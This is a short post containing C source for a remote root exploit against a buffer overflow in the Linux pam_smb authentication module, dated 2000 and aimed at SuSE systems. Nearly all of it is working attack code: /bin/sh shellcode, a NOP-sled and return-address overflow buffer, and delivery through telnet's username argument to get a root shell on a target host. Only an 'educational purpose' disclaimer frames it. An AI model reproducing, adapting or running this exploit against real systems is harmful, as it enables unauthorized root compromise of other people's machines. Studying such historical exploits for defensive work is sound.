Based on Shaun Clowes' finding, I developed a remote root exploit for linux pam_smb bug.
Below is the soure code of the exploit.
/*
* PAM_SMB REMOTE ROOT EXPLOIT
* by bibble -- bibble@263.net Oct 4, Y2k
*
* test system: linux suse 6.3
* affected system: linux suse 6.2 6.3 6.4 7.0(but not default package)
* other linux systems include pam_smb package
*
* The Pluggable Authentication Module (PAM) system is a means by which
* programs can perform services relating to user authentication and account
* maintenance. Detials see:
* http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html
*
* pam_smb is a PAM module which allows authentication of UNIX users using
* an NT server. Versions 1.1.5 and before contain a buffer overflow that
* would allow a remote attacker to gain root access on the target host,
* provided that the target host has the module installed and configured.
*
* If remote system's login sevice is authenticated by pam_smb, that is the
* /etc/pam.conf file includes a line like:
* login auth .. /lib/security/pam_smb_auth.so ..
* or the /etc/pam.d/login file includes a line like:
* auth .. /lib/security/pam_smb_auth.so ..,
* the system can be controled remotely by below exploit code.
*
* Thanks: Shaun Clowes who found this bug
*
* THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND I ACCEPT NO RESPONSIBILITY
* FOR THE USE OF IT
*
*/
#include
#include
#include
#define LENGTH 400
#define ADDRESS SUSE63
#define SUSE63 0xbfff6990
#define OFFSET 256
unsigned char loop[] =
"\xeb\xfe";
unsigned char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void usage(char *s){
fprintf(stderr, "Usage: %s [-a address] [-o offset]\n", s);
fprintf(stderr, " -? for this help\n");
}
#define ALGN 3
int main(int argc, char **argv) {
char user[LENGTH],ruser[LENGTH+3],host[20];
char *arg[4];
unsigned long sp;
long addr;
int offset=OFFSET;
int i,j,c;
printf("\nRemote exploit for pam_smb authenticated module which is used by login\n");
printf("bibble -- bibble@263.net Oct 4, 2000\n\n");
if (argc < 2) {
usage(argv[0]);
exit(0);
}
sp = (unsigned long) ADDRESS;
while ((c = getopt(argc, argv, "a:o:")) != EOF)
switch(c) {
case 'a':
sp = strtoul(optarg, &optarg,16);
break;
case 'o':
offset = atoi(optarg);
break;
case '?':
usage(argv[0]);
exit(0);
}
if ( !argv[optind]) {
usage(argv[0]);
exit(0);
}
addr = sp-offset;
for (i = 0; i < ALGN; i++)
user[i] = 0x90;
for (; i < LENGTH; i+=4) {
user[i ] = addr & 0x000000ff;
user[i+1] = (addr & 0x0000ff00) >> 8;
user[i+2] = (addr & 0x00ff0000) >> 16;
user[i+3] = (addr & 0xff000000) >> 24;
}
for (i = 0; i < (LENGTH - strlen(shellcode))/2; i++)
user[i] = 0x90;
for (j = 0; j < strlen(shellcode); i++, j++)
user[i] = shellcode[j];
/*
for (j = 0; j < strlen(loop); i++, j++)
user[i] = loop[j];
*/
user[i] = 0x90;
user[LENGTH-1] = '\0';
user[LENGTH-2] = 0x0d;
/*
printf("%s\n",user);
for (i = 0; i < LENGTH; i++) {
unsigned char u = user[i];
printf("%02X",u);
}
printf("\n");
*/
printf("Address:\t0x%x\tOffset:\t0x%d\n",addr,offset);
strcpy(ruser,"-l ");
strncat(ruser, user, LENGTH);
memset(host, 0, 20);
strncpy(host, argv[optind], 20);
arg[0] = "/usr/bin/telnet"; /* use your PATH of telnet */
arg[1] = ruser;
arg[2] = host;
arg[3] = NULL;
printf("Injecting ShellCode ...\n");
execve(arg[0], arg, NULL);
return(0);
}